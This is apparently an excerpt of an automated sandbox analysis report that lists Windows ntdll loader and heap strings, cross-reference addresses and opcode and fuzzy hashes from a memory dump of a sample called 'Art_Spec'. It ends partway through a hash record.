                                                        • ThreadPool: callback %p(%p) returned with the loader lock held, xrefs: 01411028
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ThreadPool: callback %p(%p) returned with a transaction uncleared$ThreadPool: callback %p(%p) returned with background priorities set$ThreadPool: callback %p(%p) returned with preferred languages set$ThreadPool: callback %p(%p) returned with the loader lock held
                                                        Strings
                                                        • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 0142362F
                                                        • minkernel\ntdll\ldrsnap.c, xrefs: 01423640, 0142366C
                                                        • Querying the active activation context failed with status 0x%08lx, xrefs: 0142365C
                                                        • LdrpFindDllActivationContext, xrefs: 01423636, 01423662
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                                                        Strings
                                                        • Getting ApphelpCheckModule failed with status 0x%08lx, xrefs: 0141A992
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0141A9A2
                                                        • LdrpDynamicShimModule, xrefs: 0141A998
                                                        • apphelp.dll, xrefs: 013D2462
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Getting ApphelpCheckModule failed with status 0x%08lx$LdrpDynamicShimModule$apphelp.dll$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-176724104
                                                        Strings
                                                        • HEAP[%wZ]: , xrefs: 013C3255
                                                        • HEAP: , xrefs: 013C3264
                                                        • Unable to release memory at %p for %Ix bytes - Status == %x, xrefs: 013C327D
                                                        Similarity
                                                        • API ID:
                                                        • String ID: HEAP: $HEAP[%wZ]: $Unable to release memory at %p for %Ix bytes - Status == %x
                                                        • API String ID: 0-617086771
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-4253913091
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: $@
                                                        • API String ID: 0-1077428164
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: FilterFullPath$UseFilter$\??\
                                                        • API String ID: 0-2779062949
                                                        Strings
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 0141A121
                                                        • LdrpCheckModule, xrefs: 0141A117
                                                        • Failed to allocated memory for shimmed module list, xrefs: 0141A10F
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Failed to allocated memory for shimmed module list$LdrpCheckModule$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-161242083
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: ((PHEAP_ENTRY)LastKnownEntry <= Entry)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-1334570610
                                                        Strings
                                                        • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings, xrefs: 0146C1C5
                                                        • PreferredUILanguages, xrefs: 0146C212
                                                        • @, xrefs: 0146C1F1
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$PreferredUILanguages$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings
                                                        • API String ID: 0-2968386058
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$LdrpResValidateFilePath Enter$LdrpResValidateFilePath Exit
                                                        • API String ID: 0-1373925480
                                                        Strings
                                                        • minkernel\ntdll\ldrredirect.c, xrefs: 01434899
                                                        • LdrpCheckRedirection, xrefs: 0143488F
                                                        • Import Redirection: %wZ %wZ!%s redirected to %wZ, xrefs: 01434888
                                                        Similarity
                                                        • API ID:
                                                        • String ID: Import Redirection: %wZ %wZ!%s redirected to %wZ$LdrpCheckRedirection$minkernel\ntdll\ldrredirect.c
                                                        • API String ID: 0-3154609507
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: (ROUND_UP_TO_POWER2(Size, PAGE_SIZE) == Size)$HEAP: $HEAP[%wZ]:
                                                        • API String ID: 0-2558761708
                                                        Strings
                                                        • LdrpInitializationFailure, xrefs: 014320FA
                                                        • minkernel\ntdll\ldrinit.c, xrefs: 01432104
                                                        • Process initialization failed with status 0x%08lx, xrefs: 014320F3
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrpInitializationFailure$Process initialization failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                        • API String ID: 0-2986994758
                                                        APIs
                                                        Strings
                                                        Similarity
                                                        • API ID: ___swprintf_l
                                                        • String ID: #%u
                                                        • API String ID: 48624451-232158463
                                                        Strings
                                                        • LdrResSearchResource Exit, xrefs: 013BAA25
                                                        • LdrResSearchResource Enter, xrefs: 013BAA13
                                                        Similarity
                                                        • API ID:
                                                        • String ID: LdrResSearchResource Enter$LdrResSearchResource Exit
                                                        • API String ID: 0-4066393604
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: `$`
                                                        • API String ID: 0-197956300
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Legacy$UEFI
                                                        • API String ID: 2994545307-634100481
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: @$MUI
                                                        • API String ID: 0-17815947
                                                        Strings
                                                        • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 013B063D
                                                        • kLsE, xrefs: 013B0540
                                                        Similarity
                                                        • API ID:
                                                        • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                        • API String ID: 0-2547482624
                                                        Strings
                                                        • RtlpResUltimateFallbackInfo Enter, xrefs: 013BA2FB
                                                        • RtlpResUltimateFallbackInfo Exit, xrefs: 013BA309
                                                        Similarity
                                                        • API ID:
                                                        • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                        • API String ID: 0-2876891731
                                                        Strings
                                                        Similarity
                                                        • API ID: InitializeThunk
                                                        • String ID: Cleanup Group$Threadpool!
                                                        • API String ID: 2994545307-4008356553
                                                        Strings
                                                        Similarity
                                                        • API ID:
                                                        • String ID: MUI
                                                        • String ID: GlobalTags
                                                        • String ID: .mui
                                                        • String ID: EXT-
                                                        • String ID: BinaryHash
                                                        • String ID: #
                                                        • String ID: BinaryName
                                                        • String ID: H4
                                                        Strings
                                                        • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 0143895E
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
                                                        • Instruction ID: 6a5c4765c2292b3294126db13a5f7d5515c0f805843a2f15706b6e757d250d6e
                                                        • Opcode Fuzzy Hash: bfab03839409a98775ecefc0060bcaeaa9ed57a4bb767fab53f067dd99276101
                                                        • Instruction Fuzzy Hash: 38A1CC72A10212DFC711EF18C980B6ABBE9FF58708F4A452EE6499B760D734ED01CB91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
                                                        • Instruction ID: 736a6d833cfbef1ec66fe06ae8b6d56f8ef6017a90a30e58949a52f2937e4c3a
                                                        • Opcode Fuzzy Hash: cc8b6248c274fedfa11aeadd91f522b0b208a1f5b36fbac44cc7f07c9a7da5fd
                                                        • Instruction Fuzzy Hash: 02917371D00216BFDF15DF68D884BAEBFB5AB88710F16415AE610EB361D734EA019BA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5a542bcc5a11fb1a44585e1d65d01fad94f22aeb4b6e59dbe1635519061f020f
                                                        • Instruction ID: a4387c32ef07413e9243568ba2159843c7aa2b27d4767fdb18dc47828a605437
                                                        • Opcode Fuzzy Hash: 5a542bcc5a11fb1a44585e1d65d01fad94f22aeb4b6e59dbe1635519061f020f
                                                        • Instruction Fuzzy Hash: E2910532A00616CBEB24DB5DC444B7ABFA6EFA4B18F19407EED05AB394EA34DD01C751
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: c0834032dc80e9fdd04e25e436cf7563fea7c64c80c8c9e69a67b3ee3ab5aa3c
                                                        • Instruction ID: 7558575c35a581f1b6363a56ef1af8395436e6605dde852397077e64ed8014e4
                                                        • Opcode Fuzzy Hash: c0834032dc80e9fdd04e25e436cf7563fea7c64c80c8c9e69a67b3ee3ab5aa3c
                                                        • Instruction Fuzzy Hash: 5681B2B1A006169BDB25CF6AC940ABFBBF9FB48700F05843EE546E7690E334D951CB94
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction ID: b7e31d643c854e9191127b1e1b4de2c334feb31c274a0ef5fc34072cf8352ee9
                                                        • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                                        • Instruction Fuzzy Hash: 93816231A002069FDF19CF59C890AFEBBB6EF94310F28856ED9169B364D734E902CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: e078b013a72bea460121906b3ecc7ca78af98f0f8b3177a915a9c832daa7fcc5
                                                        • Instruction ID: 0a1709f4da725361fe0fae2e6d24e7888a18e95d00140861b694ae49c5f940fc
                                                        • Opcode Fuzzy Hash: e078b013a72bea460121906b3ecc7ca78af98f0f8b3177a915a9c832daa7fcc5
                                                        • Instruction Fuzzy Hash: A1718571A447029BDB22DE1AC580A6BB7E4AF44258F04493BE959D73A2D730EC858BD2
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
                                                        • Instruction ID: 66746a1cc2814f5e71a467deabf7eaff4ea1200506d1e34174fee62cfc16f1d0
                                                        • Opcode Fuzzy Hash: b4fbd3eb5823a89f300f09b32e0072868763e74a8fcbb7597a04a69d326c5367
                                                        • Instruction Fuzzy Hash: A8814C71A00719EFDB25DFA9C884AEEBBF9FF48358F10442AE555A7290D730AC45CB60
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 63da8c2e4cc54df79fb6709caa3a0e0e56bfd3f85da96d45073e5efe9f304382
                                                        • Instruction ID: c31259b6dad002b3cb007cb05d66569a13fa8af4eff40744ebfd2b5ff895750b
                                                        • Opcode Fuzzy Hash: 63da8c2e4cc54df79fb6709caa3a0e0e56bfd3f85da96d45073e5efe9f304382
                                                        • Instruction Fuzzy Hash: 6B71BB75D0022A9FCB25CF59D9907BEBBB5FF48B14F59411EE946AB364E3309801CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 7c9f86c7a2dbe0ef523555012f514428e5d9364992fa8d4fea407b9e9b095735
                                                        • Instruction ID: 18f49270b0f8c454f12144c888a5e83bdb6ea82b9e66eafcb8cbf61d4bba3c52
                                                        • Opcode Fuzzy Hash: 7c9f86c7a2dbe0ef523555012f514428e5d9364992fa8d4fea407b9e9b095735
                                                        • Instruction Fuzzy Hash: 0C71C270904257AFEB15CF99C840AFABBF1EF45314F04805AE994DB322E335DA46C7A0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ff378d63de08f4a7ba659a048b937ba741f43b4b1f677b97844abb07a5521a12
                                                        • Instruction ID: 23b39bcb342e74668659bd8aa6ac7eda7194612f8a21a2040a663955dc670192
                                                        • Opcode Fuzzy Hash: ff378d63de08f4a7ba659a048b937ba741f43b4b1f677b97844abb07a5521a12
                                                        • Instruction Fuzzy Hash: 89717F70A00205EFDF24CFA9D944A9EBFFCEB90348B5A815BE614A72B8C7318D41CB55
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c63b309e2c8da2dffdd377176af39793dfc6549d521bbbd638de097d4285286
                                                        • Instruction ID: 8ffbda48de1c1d0b2f73a127114725f10870f010abbf514222c118279f7058af
                                                        • Opcode Fuzzy Hash: 4c63b309e2c8da2dffdd377176af39793dfc6549d521bbbd638de097d4285286
                                                        • Instruction Fuzzy Hash: 8971CE356046428FD311DF2CC480B6BB7E5FF84B18F0585AAE8998B762DB74DC45CBA1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction ID: d4fde9f263bcdcbb8656af537e9bae2d6440d553b61b5f1f165d39b18b824483
                                                        • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                                        • Instruction Fuzzy Hash: 7E715F71A0061AAFDB11DFA9C944EDEBBB9FF98704F10456AE505E7290DB34EE01CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
                                                        • Instruction ID: e7f6dc49a5b1e5c75d399b4f9c31d256325678b236bf5cd6e429d7b4deb50d07
                                                        • Opcode Fuzzy Hash: 5787a0b256033e9685c60b23c3805b0118e54d637e14bde8b5f137ac46d32ae6
                                                        • Instruction Fuzzy Hash: 9271EF32200B01EFFB22DF18C844F5BBBA6EB45724F16852AE6168B2B0D774E945CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: ad754cc36b199072b456af1d125f882e9434a4f09a75f9507bcafdb55db5174a
                                                        • Instruction ID: bca2b1e7ec33a5903ef592ff955fb1be76cc71f8b7df95af8de46472c8fdab14
                                                        • Opcode Fuzzy Hash: ad754cc36b199072b456af1d125f882e9434a4f09a75f9507bcafdb55db5174a
                                                        • Instruction Fuzzy Hash: AE81C271A04305CFDB24CF68D584BEE7BB9AB48314F2A416EDA00AB7A5D7B49D41CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 53b8ff891191f0b7c5659badeea91e56f79bb24cabf0f46fe14b512804bc31db
                                                        • Instruction ID: acef328f9bfdf6800d8d97b74fcd895c6af602dbc696ca7d1a54ea96c04979b2
                                                        • Opcode Fuzzy Hash: 53b8ff891191f0b7c5659badeea91e56f79bb24cabf0f46fe14b512804bc31db
                                                        • Instruction Fuzzy Hash: D851BD72504B12AFD711DA68C844B5BBBECEB84758F11493EFA40EB260D770ED0587A3
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 26289fdaf23c0d81b74df613b9ec76c29834ecc95986266b5eddf9046d6d0a27
                                                        • Instruction ID: 64aca24084fed538e348e8e8c5fe3e625b8d11ce98ccd3e7fb8bf2ac05c00830
                                                        • Opcode Fuzzy Hash: 26289fdaf23c0d81b74df613b9ec76c29834ecc95986266b5eddf9046d6d0a27
                                                        • Instruction Fuzzy Hash: 7D51CF70900706DBD761CF5AC880AABFBF8BF64714F10462EEA52976B2DB70A541CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f844c86e17d93e5575183929f2be22c5561d5e30dfbfdad54e7dc955173a1be9
                                                        • Instruction ID: c68df74d752fa9066be2e15d892686d30b9913b3278bcb1832eda964a6c93155
                                                        • Opcode Fuzzy Hash: f844c86e17d93e5575183929f2be22c5561d5e30dfbfdad54e7dc955173a1be9
                                                        • Instruction Fuzzy Hash: B4518B71200A25DFDB22EF69C984EAAB7FDFF14648F81442EE601976A0E734ED40CB50
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 39c6dfd72bf9c7810bcf16f6838d650187902154a7d5bb00b2ab2bbb3873e020
                                                        • Instruction ID: d4bf771cb628dd7deee38f8059c790eeb288890a0f1953a4f64263f39f47f035
                                                        • Opcode Fuzzy Hash: 39c6dfd72bf9c7810bcf16f6838d650187902154a7d5bb00b2ab2bbb3873e020
                                                        • Instruction Fuzzy Hash: 03517D716083029FD794DF29C880A6BB7E5BFC8208F48492EF985CB362E730D945CB52
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction ID: 9f169ad0d8b54efed807d694a4cc22d7b3c5bf6a8a682739692a6800eea6ee4c
                                                        • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                                        • Instruction Fuzzy Hash: BC51B272E0020AABDF15DF98D440BEEBBB9EF44758F05406AEA15AB750D734DD44CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction ID: 0a5aa75f849e0a99408c726ee88d11e09635ffe46a2be946bdc6de9309659c53
                                                        • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                                        • Instruction Fuzzy Hash: 1D51B931D0120AEFEF16DA94C880BAFBB75AF88324F15466AE611772A0D7309D41CBA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4eff83488d8b22bd34b0f4db4a76b56623a729124e601683ab5e8085efd87551
                                                        • Instruction ID: 35d81268e410196fbea903dec03530773ff59b2e736095cf690d43550d0317ef
                                                        • Opcode Fuzzy Hash: 4eff83488d8b22bd34b0f4db4a76b56623a729124e601683ab5e8085efd87551
                                                        • Instruction Fuzzy Hash: 2641C7717016139FE729DB2EC898BBBBB9AEF90620F08851BF955873A1D730D801C691
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: b2214d85ac141c258f660bd30745e1664a913db56a4c73ea1f9ff26162619710
                                                        • Instruction ID: e9e2c7ed6c658ceffaa7e961ed342d6153b0b80997a06b2f8083561fdc86804e
                                                        • Opcode Fuzzy Hash: b2214d85ac141c258f660bd30745e1664a913db56a4c73ea1f9ff26162619710
                                                        • Instruction Fuzzy Hash: D2517E71900216DFCB20DFA9C9C499FBBB9FB88758B56451BE505B7710DB34AD02CB90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                        • Instruction ID: 37f572e869818369d4e9e10206776847ab9a76f0364b8816d86493c223c20122
                                                        • Opcode Fuzzy Hash: 47e19e6003049d3f178603af37d77926a7e826ea9c8114a87b037099219d6f39
                                                        • Instruction Fuzzy Hash: 35316976A4012DABCF61DF58DC85BDE7BB5AB98350F1400E5E908A7261DA30DE91CF90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                        • Instruction ID: e7f5399f1b9ac150ffff4405e2276929f18979c332cfd1db38aa7cafeefbbb21
                                                        • Opcode Fuzzy Hash: f6798e3930090f8acc73cf706636bf4046e2ab43e07238c21c24f60bed82dec1
                                                        • Instruction Fuzzy Hash: 0231B772E04219AFDB21DFADCC40AAFBBB8EF44754F014436E516DB250D670AE018BA0
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                        • Instruction ID: 9e3170075c0b9cf5a19ad8a3146acc911b387f4d0a9332fe67b9c794d40e9385
                                                        • Opcode Fuzzy Hash: 0e03966873de51317aae75398429c0d3157a53757b3dd990f65d25adeb4e555f
                                                        • Instruction Fuzzy Hash: E831E471700A02EBEB229F6DD840AAFBBBAEB54754F06406EE505DB361DA70DC018B90
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                        • Instruction ID: 25ecad5ea7b89315524ee6d3e9cd4dcdd500ebd5d1dd67702a77372b01137ec7
                                                        • Opcode Fuzzy Hash: 4c2538a58510ec7e50772c22efaf032011fd95b025534a65a804f90f93429afe
                                                        • Instruction Fuzzy Hash: DE312432A04216DBC716DE6888C0AABBFB5EFD4258F014529FE15E7B20EB30DC0187E1
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                        • Instruction ID: f121b43ffb83d7844401b47ee0964afcfffea26c3b8d87b0d2e9f4a8be6036f8
                                                        • Opcode Fuzzy Hash: f38633e412598917eed8f7116907cccb78f426435f31d4a4c48be7742b7587c2
                                                        • Instruction Fuzzy Hash: C2316DB16053018FE720CF19C840B5BBBE9EB98704F154A6EEA84D7765E7B0E944CB91
                                                        Memory Dump Source
                                                        • Source File: 00000005.00000002.2507000951.0000000001380000.00000040.00001000.00020000.00000000.sdmp, Offset: 01380000, based on PE: true
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_5_2_1380000_Art_Spec.jbxd
                                                        Similarity
                                                        • API ID:
                                                        • String ID:
                                                        • API String ID:
                                                        • Opcode ID: 0db01105071e305578d35fd0a84dce3d89a7587bc94cbde32e7e57e396344d18
